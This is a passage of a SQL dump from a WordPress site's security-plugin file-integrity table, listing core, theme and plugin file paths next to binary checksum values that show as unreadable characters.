���V��\'��Z�:m','wp-content/themes/illdy/layout/fonts/font-awesome/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!p���w���&h','X�\n}�l�//���C��;N�YTV�|t]Yb��','',0,'?'),('&\\\"�,ȓ�-w	q/(�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.namevault.php',0,'��zUvc��pΔ�l','��zUvc��pΔ�l','����f�9\\bν\"x`:�c8M��F�����f','',0,'?'),('&dv�>�^�8��Y��m','wp-content/plugins/contact-form-7/languages/contact-form-7-th.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WNY��$�R�~��\"P��','�$���‘H@ԗR���h�����Z��i]��A','',0,'?'),('&ee�\n3K���vZ��','wp-admin/ms-delete-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?bڔ��3��\r\n]m��','�jn�B����TN�&�e��>h��m���uIz<','',0,'?'),('&k\0v_fcb��v�����','wp-includes/js/dist/format-library.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ھ�Źi���RK�[2��','=I8�T`3��0�����ʩg�:/\0��Nri�','',0,'?'),('&q\\����Q\"b���v\n','wp-content/themes/precious-lite/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�|>�hkt�C)�2��','\n\0�N�p�\nJ=#j�b�g�.g�FKnf��9�','',0,'?'),('&s�oD#1ڨ�\"�O','wp-content/themes/hueman/assets/front/js/lib/jquery.waypoints.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�eλ?�T���*/','?[\r9�qT��͕FUt�M&Jǀ7\rl��2g��','',0,'?'),('&t!0^g��bJ�c,>3','wp-admin/upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E_-�\r3�','X΢˔&��(�N�\\F�0%��o�0��>�','',0,'?'),('&D���Q�R��w�]','wp-includes/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-r�jiI�أe�b','��b��E����&q�����*��������','',0,'?'),('&��0�/涫��o&','wp-content/themes/clean-magazine/inc/clean-magazine-featured-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T�/)y\r��)��','����l� ��Y!(�]�Z�����1o�$˚�','',0,'?'),('&���ɚ%��)�W&�i','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/RepresentedCountry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>XVD��m�|P6\n','�l=�b:џ��	R�Z��	�����	��6','',0,'?'),('&�Q�E�Y.+f6w��S�','wp-content/plugins/dw-megamenu/assets/js/dw-megamenu.js',0,'��Z�%E=<��|[0M�','��Z�%E=<��|[0M�','U y;�\Z������8�[�s����n*�а	qj','',0,'?'),('&�<x�:�4�2t��n','wp-content/themes/morfeu/assets/js/bootstrap/carousel.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�����1Sܓ','/�[�a�~�yEOH�sb�VT�&����~20�J�','',0,'?'),('&��65���l\0��L�','wp-content/plugins/wordpress-seo/admin/class-import-woothemes-seo.php',0,'�0�\n:uݢ,�Z�#��','�0�\n:uݢ,�Z�#��','�V�\Z��-�խ&���*��y�ǩ�%tŖ�','',0,'?'),('&�i��e����c�\\','wp-content/themes/illdy/layout/images/blog/blog-recent-post-4.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e,�,*}�\Z���','�f��g+eƺN�\'�wU�S����̡��l�','',0,'?'),('&���D]��C�=�#[','wp-content/themes/nirvana/images/socials/Yelp.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n_�k�+?T�����','d���\0�/��\n�7}�� @\Z���n�8��\"4e','',0,'?'),('&���c\"w���r�f�','wp-content/plugins/unyson/framework/static/libs/font-awesome/fonts/fontawesome-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@JRU��~���-���','���\Z�K�b��\'�5��.���X\n�ʫz4','',0,'?'),('&���Rw?~�j�hJ�D','wp-includes/Text/Diff/Renderer/inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�n5�P�����B\'�','X�U.k⻺�@-(��5�N�����V','',0,'?'),('&��!��mtL�W�P�','wp-content/plugins/spam-captcha/font-1.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\nqe�H��:\"','�͹����a��Q���~�p^	�cS��m��]�M�d','',0,'?'),('&��]0W��\n)�=��','wp-includes/js/tinymce/plugins/directionality/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Er�HD��D��3��@','<����o�@�:����-�Eg���)6^Ѽ\'��','',0,'?'),('&�`�O�Q5�Q�43�','wp-admin/theme-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����f�;`�����','�����Cs^��	_z�2����\r�\"F����uk','',0,'?'),('&���	P�shcusS','wp-content/wflogs/attack-data.php',0,'#ح\n���y�Ib�\r�\r','#ح\n���y�Ib�\r�\r','l��4Eq�{���������\'wg�31�c�w:�','',0,'?'),('&�vA��Q��c��qw8,','wp-includes/theme-compat/header-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Omz8��F����','�����})d!q	,@,��j��v	����E���','',0,'?'),('&�<9��_��\\�{�H�','wp-content/themes/morfeu/assets/sass/bootstrap/_bootstrap-compass.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�^4�͙���_','�yۊ��`��@��.ς���J�	p *��]�','',0,'?'),('&�ų�<V����0<�','wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer-header-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wf���d#ֻ{��;�','Y(Ǜ�Z����\\t�e#�W�Vw�/=�O�&�ֳU','',0,'?'),('&饱����W��؀�|�','wp-includes/widgets/class-wp-widget-links.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�/k�h\n��ֽ[Nv	','�쇉���,�x���-��DO�,��7ш�Q�','',0,'?'),('&�Y���z�q�[F�f@�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ⶨ�;*���?��z�','���:O.�\'�~y��@�Y`FMN�:�n�.�;q@','',0,'?'),('&�aUG���κG��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!!o=b��i','k�����{��G9��W1h��`���sҗ�D`�M�','',0,'?'),('&�v��g�D�9�;1�','wp-content/themes/square/footer.php',0,'���k.3-���d`��','���k.3-���d`��','T@\\���8V!�o�+%9	Bd뾣\r�Ғ�_','',0,'?'),('\'\0#΂�j��ȹ�x�','wp-content/themes/wen-business/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:1ɾ�ܴ������','�B�5/#�M�]�LS߸_����1�&�3$�Z?�','',0,'?'),('\'H�j�H�g��)�','wp-content/themes/the-minimal/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nGBW�/6Qwh�\0','��.�����V�7�ne��\ZU�c�T�!:�K','',0,'?'),('\'���C��墌�L','wp-content/themes/verbosa/resources/fonts/icomoon.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���x�;�˸_-nx','RB���x�O#ػ���x��>ml����q�\\�','',0,'?'),('\'J��d,�z7���','wp-content/themes/square/woocommerce/single-product-reviews.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(mU�M�bk�S��v','��\\�Ku���J��`p��w*oL���7','',0,'?'),('\'y��Ƙ�\n�i�','wp-content/plugins/wordpress-seo/admin/google_search_console/views/gsc-display.php',0,'�S	�)M$1���[�','�S	�)M$1���[�','0;z#^�,�ۋ.�)[�q����\n�ʭI)��','',0,'?'),('\'?��)�F��U�e?','wp-content/themes/supernews/acmethemes/customizer/feature-section/feature-enable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x��K���/�9�{�','�s�*s�ڂ�#s�x�bVF�>�D�w�ɐ�]�Y','',0,'?'),('\'uU��~B��ǔ�A6','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.gandi.php',0,'ݝMM9�蓳�lT7�','ݝMM9�蓳�lT7�','���N�F/+�-�*�\'6B����cb�[�','',0,'?'),('\'%賉���DNlC�%','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.eu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�ZA~T��yԅ2�','|�Z��~��\'�̫5�܁���R�^/8,s��','',0,'?'),('\'6��Ѩ����p ��','wp-content/plugins/wordpress-seo/inc/sitemaps/interface-sitemap-provider.php',0,'cCPF�Ƽ\\BA�\\�','cCPF�Ƽ\\BA�\\�','Sd�`K��g+�,_m�����>�����','',0,'?'),('\'=!Za��a���jU�Q','wp-admin/css/site-icon.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}�E���p0lu','i>œӺ#�&�2Z�\'��K(*�����','',0,'?'),('\'Ac���,	~�6�ܦ�','wp-content/plugins/wordfence/views/onboarding/tour-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:��%� �);�\0','\Z��\'ġ맪���.s\'��sd�4�^��I','',0,'?'),('\'M��w�񑍷���\rKj','wp-admin/includes/class-wp-site-icon.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nG�+�*�e��`�r�B�','�=R�&������r��e�Xr9�h��\n )��','',0,'?'),('\'_�2+�\Z��|Ć�','wp-content/themes/accelerate/js/navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$��\"�/\nx������','�>��B+\Z����0V��p-�\r���s��.','',0,'?'),('\'rL�j}O}���|Y�','wp-content/themes/wen-business/templates/contact.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���p2.ԙISs��%','�j�/=q\r�\0}_\\��?f�����\0','',0,'?'),('\'���� �o���S��','wp-content/plugins/wordfence/images/icons/ajax3.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mw�ߴtꍓ\'\n���s','�dz��\n�yK�Ʈ��\'#]�x	VJR��.=:','',0,'?'),('\'��1k�@(SuJ�l�','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/cache/Google_Cache.php',0,'#Ilk�W��E�~��:�','#Ilk�W��E�~��:�','R��O���Z��<o#~,��/\\Nl߷%\r�','',0,'?'),('\'�\"z��n��p��aE','wp-content/plugins/akismet/views/enter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EG�T��A>�sJ','F���R�<`�=#i�z�Ag�Dd)��q','',0,'?'),('\'���n~�p��L�R�h','wp-content/plugins/unyson/framework/includes/option-types/wp-editor/class-fw-option-type-wp-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�0V����C�\nf&S','����.P�5�fعQ��Z_���4�:�q]y�','',0,'?'),('\'�N�\n|t�!�!��z','wp-content/themes/travelify/languages/sv_SE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���EhC�����d�','*iq-n �~7�M�P5L�Fr\n\\�9�s%�a�+','',0,'?'),('\'�g|͹\"���jݹ2�','wp-includes/js/jquery/ui/effect-transfer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OԩN��i���1','Ł\0p�,�\\�!ON)�Q���Xl ��k�s�l�','',0,'?'),('\'�x��m/�O\n�X\Z','wp-content/themes/fluida/includes/setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�¾��1��]9^�','��s��櫡�S,�Ws�O�l���>VU<��\r','',0,'?'),('\'Ӥa��\r�*�1�','wp-content/plugins/unyson/framework/extensions/blog/class-fw-extension-blog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=��\n��� �U��','��+`�S�on���-�?e�w��?Es1��oq\r','',0,'?'),('\'ө]��u1N�ߛ�T6q','wp-content/themes/point/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�|�>����#�4','\Zo�J>ܞhVkY^����-\"�?c��~���_�','',0,'?'),('\'���_iYm1��R','wp-content/plugins/wordfence/views/scanner/scan-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��Z�}giؑz2*P','��wu�p	-���D����<z�w榀UD4�Ԥ','',0,'?'),('\'��y����g�!K','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.es.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$	�]��x���','+���t�;�/B�%4N�\nG��?|E�H)�','',0,'?'),('\'��=�-���AC\\K','wp-content/themes/twentytwentyone/assets/sass/07-utilities/color-palette.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v������m��~J��','��ܙ�	G���gi�a@{� {)��8��~��','',0,'?'),('\'�t��\r�5.-�j','wp-content/themes/illdy/sections/front-page-team.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�$�\rvV6��J','�.�8���pO�n+ꑫ��ДoEC�kT���','',0,'?'),('\'�p�jA�y�(��ވJy','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/fr.js',0,'����<2����B�','����<2����B�','ON�ڪ��V��ȉ��K�藚;�p��ՌV�','',0,'?'),('\'�˨�-�L<U�w�r3�','wp-content/themes/mh-magazine-lite/languages/mh-magazine-lite.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t=՞ީf�\rT@�','��m3i�i�5��G�f}B����LR�ޝ','',0,'?'),('(,iߗx�s?����}�','wp-content/plugins/unyson/framework/static/css/backend-options.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JS�q�dž5�.�S�(3','#�Bј�HN+<��uLB@[��t�N>�;q�U;','',0,'?'),('(��l/�R� �kل','wp-content/themes/nirvana/admin/images/schemes/Straight Skyline.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KA���������|�=','+Хx�u!��I��4����#cmT�9[WM@{','',0,'?'),('(��g%\0��4��l>��','wp-includes/js/jquery/jquery.schedule.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��T�k�f؞���','��?��vEʔ��wj���C�P՝��_��','',0,'?'),('(���6�ld�9.`+�','wp-content/plugins/dw-megamenu/assets/js/nav-menu.js',0,'�fS�p��\"Ə^�','�fS�p��\"Ə^�','\r��`YO�<�o,�yK�{og/d�����P�','',0,'?'),('( �4�I��b�c','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.tr.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ذ	�ԩo�əwܞ�','!}~�����]G����۰�8i�ჳd','',0,'?'),('(?���>��S�N揚�&','wp-includes/images/media/default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-����I�B�h�@���b',':�oL�JDj�$->�i��\'�6n֠��Ui','',0,'?'),('(WQ=3��y��b6','wp-includes/cache-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�Iq_��P�$ӄ','���]4\'��9���w�E��J�J�\r�nh�','',0,'?'),('(Y���):<�T���','wp-content/plugins/dw-social-share/assets/img/style-7.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H��^BO��e��','�����r��>�%��J�K4탟��m�8���','',0,'?'),('(Z��_��l�Ζf!�','wp-content/themes/wen-business/third-party/font-awesome/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1˦�p���� y�G','��a�F�}>��n�b��PT�Ŀ�8�?Ѷ','',0,'?'),('([d��������BQ��','wp-admin/js/updates.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����nZ4~�ح��p','���c9؋�@���C�Q�|�˙�v2�vw�V!�','',0,'?'),('(jB�,�����)���d�','wp-content/plugins/spam-captcha/font-8.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����h�~�3�mx','$K\0��V|8���:�w�-_ǹ1��{�j�@g�f','',0,'?'),('(u���c�9�}��','wp-content/themes/verbosa/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RM3���*�d˦2','I�\ZY����}���>����9m)��k\r)vg�','',0,'?'),('(x*J���,�LÛn�<K','wp-content/plugins/wordfence/images/icons/arrow_refresh.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�w�`�`�|�}$G��','u�/2/����@�H�_Ilh����/�aU:�	','',0,'?'),('(~6vqV�0�{�\"','wp-includes/ID3/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݣ��z�eѧѥk58�','l��r����p4��FBܢ7\"Z:�W�v���','',0,'?'),('(���v|T�— ¥�','wp-admin/includes/screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɬV\Z	j���A��|�','~Ky�i�2j*SgT<�q{�aa�%���;���;�','',0,'?'),('(��0�Y��塹R��B�','wp-content/themes/the-minimal/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˅�y*��2���!','B�6ۀK���>)u�f�aAB�#��/� C9','',0,'?'),('(��\'R�QԦ�C���۫','wp-content/plugins/all-in-one-wp-migration/lib/view/backups/backups-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�q�i����&i4��','�|�y���>k����7�u�v ��6pv����','',0,'?'),('(���y\0	�pDO�`','wp-content/themes/twentynineteen/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�0�,Xq�����3','�����ɐ4�|]o\'�7�+�|f��o�^\Z','',0,'?'),('(�Y�\'��^kz!q����','wp-includes/js/dist/block-directory.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\0B�T���*�','<T���q��p��t�-����-�˱�-�\'�','',0,'?'),('(�\nT��.�jTڶ�lg','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.assorted.php',0,'�t�A+�\0��Ew\n=m�','�t�A+�\0��Ew\n=m�','������\Z<пp*m�Y�5���B�v�0���','',0,'?'),('(��Օ�)�(pwBl','wp-includes/js/dist/list-reusable-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q:eyH ��m�','��6��X��Qj������w4�P�\0D','',0,'?'),('(�|�Z�x�T���[�u','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Original.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z?��(��E�Wup�','�+���D�\0ej�\rg���ϧ��4�','',0,'?'),('(���>f0\Zg[|���','wp-content/plugins/wordfence/lib/wfJWT.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}{ j�N���c�K�','0mhN`x�x~H�Lj�s����O��P��,','',0,'?'),('(�;d�����ƥ謁�','wp-content/plugins/unyson/framework/includes/option-types/gradient/class-fw-option-type-gradient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�c�6�c�	ȗ�j','\n�v�]J���)��^?gzWE^(I��r<�?X��','',0,'?'),('(�,\0[�7����34','wp-content/plugins/contact-form-7/modules/count.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�َ���B#��','����eÒ�kJ��~�C||Ցa������','',0,'?'),('(�����s�e	�4�','wp-content/themes/tortuga/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\\�B�)��','f�py����V�YRZ��V�1k���X�X�{�C','',0,'?'),('(��LS[��Wl#���','wp-includes/sodium_compat/src/Core32/Int64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%m�S�,���\\�','U���!�6��/�U�cq���n���@�+�','',0,'?'),('(��g~%p�r��e�!�','wp-content/plugins/unyson/framework/manifest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jmL햜P�����W�p','4��[X\0��Y�x��#94>�Q@�i\\|�Cl','',0,'?'),('(�^�3N������3','wp-includes/wp-diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��-x�<�z^�Wet','�a��;�ɺ��*2Z��f1��\"�\n�Nt~�>��','',0,'?'),('(��2Ƈ�|Pƺ0�V)h','wp-content/themes/wen-business/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��i�B!r�E3�7Y`','�ᣃ�Z��I�\"�w\rg�}���r���̾�z)','',0,'?'),(')���|�{4�+]�X(','wp-includes/Requests/Exception/HTTP/411.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�R��M�.�Z`G�','���U�^����9p��&���`�nM{� n�L','',0,'?'),(')=ypO-������','wp-content/themes/morfeu/assets/js/bootstrap/transition.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�gT�>ʭ��|)ie','5���壘v����G��qOȩEv[�}u��%�','',0,'?'),(')AP#�\nm�W\n��^��','wp-content/themes/nirvana/includes/theme-loop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=k�y���^�4���','��3�x�{�d�������ѪY�ww���^\0','',0,'?'),(')AQ�wp0+���-���','wp-content/themes/sg-window/publication/inc/plugin-enhancements.php',0,'�M��j�N����3v','�M��j�N����3v','แ�\0�a�v�SW��\0���w@>�j�o�','',0,'?'),(')MUy�\Z[�_�����','wp-content/themes/travelify/images/arrow-right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D?mT�a�!�.��~�','���2\"���=��_�Ly�ѓ`��7���B۲','',0,'?'),(')dcL�����ӏ��<','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.nicco.php',0,'^��ErW3��a)�r�','^��ErW3��a)�r�','�9K�1:pG�,��ڪ�ʠ�R6IU������\0','',0,'?'),(')d��},��w-�m��','wp-content/themes/supernews/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�<1v-�~ș��c\r','�rø�m(�c��N�1��r\\���Ҽ�E�dw','',0,'?'),(')e�DZ5�60PyЬI��','wp-content/themes/illdy/layout/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^\'��4�5�۔�X\"b�','I=��Q•�� �/���.p�J~O(`�(��I�','',0,'?'),(')y��8��l���H�','wp-content/plugins/unyson/framework/extensions/analytics/settings-options.php',0,'�97�m�in;o۔�O','�97�m�in;o۔�O','D�6����9ur ��wwA�3�����y�t��','',0,'?'),('){�jW-_�Q=?�GlҢ','wp-includes/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�,���]�8�','k�*T��I��m�6J�׫��f>䖂ꯓ�V��','',0,'?'),(')�ѭ;>H�K�l�&]�','wp-content/themes/relia/inc/js/stellar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H$��Q��(\'d_^��sh','�󓡂V�#���5�J��Gg��8����_�','',0,'?'),(')�a%������*��Ǵ','wp-content/themes/aqueduct/fonts/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�6��M3�n�.}a%','����\'�����#I �\0�(0����\\k�4�','',0,'?'),(')���~��X츺_�','wp-content/plugins/wordpress-seo/admin/class-import-wpseo.php',0,'��7M}R^d	�I���','��7M}R^d	�I���','��d,�j<ou�����`����2�o޵v','',0,'?'),(')�I��	^(5��ֆm��','wp-content/themes/skt-construction-lite/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v���@(������a','2P�s���g��=�8��d�BV��C�\'�','',0,'?'),(')�Oz=�u����˷','wp-includes/rewrite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�	U�ϵ=.�z<`','x�Ɵ� ��@g<�A݆\"c�����;���S<g','',0,'?'),(')̃�2�k�h���! ','wp-content/plugins/akismet/akismet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E���[��,�I�S6','�n[�	��%�2l�$L/a�b�E0a_c}H9�3ڣ','',0,'?'),(')�N��H�3\n��@`','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.da.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F\'KT�r��A3SM','\0���Pj(d?{tCy��{Ւ`��k[� �','',0,'?'),(')ӲA��_�Rh����','wp-content/themes/lightly/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�͒2�%��O�CE>�','�Hs[l�q �5\r(�@��/�<8�mu���','',0,'?'),(')�E�i�\0��m�.�nZ8','wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-b2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nA\r����F�H�T��','D�����\r����\0�3�=�q�.���!�]�u[F�','',0,'?'),(')�6#�_��̟SAF�','wp-content/plugins/wordfence/views/scanner/issue-control-repair.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a!�[)T.�nk=ݗ��','�tl���J%�0wdE��\"�4.t�kL��9�1��','',0,'?'),(')��]���Z$�P%','wp-includes/embed-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U�z�A>z�\'!f*','*xJ���\"�t��\r^K$U�09���Z�иC�ru','',0,'?'),(')�I�\nΆV���q��{','wp-admin/authorize-application.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��xO����$:��g-','M����J,�l��zEX�N>�����T��','',0,'?'),(')�\nn��`�p�F ','wp-content/themes/nirvana/admin/images/schemes/Grayscale.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(T�t΍�o�I= ���','-�Ʌ�\"5���ʁ�O C�yh�%Q\'�˦;]�','',0,'?'),(')��>��+/&<z7�;�A','wp-content/themes/nirvana/fonts/sourcesanspro-bold-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"t����C��^o/(n','�L���y�����|�_W�?6��0v#k','',0,'?'),(')�,7�H�1�����\\','wp-content/themes/hueman/assets/front/fonts/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|n���p��v&�','�1+<K�M��˷F@&R̲���t|a==m��R�','',0,'?'),(')�`��f,��u�4��','wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X� D2%l#b/�W','ջ�R�\0���\0�����i�H//���w��\0�','',0,'?'),('*�=|,��{� �A�W','wp-content/plugins/spam-captcha/core/lang/SL_framework-fa_IR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6H1V��ľ,�	%�','sE�ASx��Sfȟ$9��{,� -�@��`�','',0,'?'),('*\ZM��Zj��<j<Z�','wp-content/themes/hueman/assets/front/fonts/titillium-regularitalic-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�`��*/�K��=���y','8j,<�Y�@cO���hZ�;�C(������','',0,'?'),('*�1�R?ۣ>�K','wp-content/themes/hueman/languages/id_ID.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�u۪aSg:k#d�ݛ','r\n���m��c\n��ʻ�y����ܰK�b�q�[','',0,'?'),('* a�F���4��u�vU','wp-admin/images/menu-vs-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�ZY<�i�Y��b�','\'��F�єE\0����7�ɡ��#�>sePض','',0,'?'),('*+���9�i_A�Ç','wp-content/themes/relia/inc/css/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[H�e�Y˗\n=�','�I��g\\�1�	Z���U��9����U^v9�K�','',0,'?'),('*-�#�}�\0�s^�Ȯ','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.ar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�kO��*�5���','��ʗ��c�R��-��v�_�}{�*R��!','',0,'?'),('*1�7���]�S���','wp-content/themes/supernews/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Suok���2�jk���;','��Z�N�0wRcv�;ګ���^q�MBl!��o�','',0,'?'),('*7V+���T���$','wp-content/plugins/unyson/framework/extensions/update/includes/classes/class--fw-ext-update-extensions-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/bVU�����^Okƃx�','~5i&�Q�!\"h��MN�m�cD��p\0����q�','',0,'?'),('*L��><1�ŭ��{q.','wp-content/themes/hueman/assets/czr/css/img/czr-spinner.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rok����h�PWMܕ�C','�1�{�K��oQ3�$�iJ���~L]u�D��ϙ','',0,'?'),('*RkS��j\nn	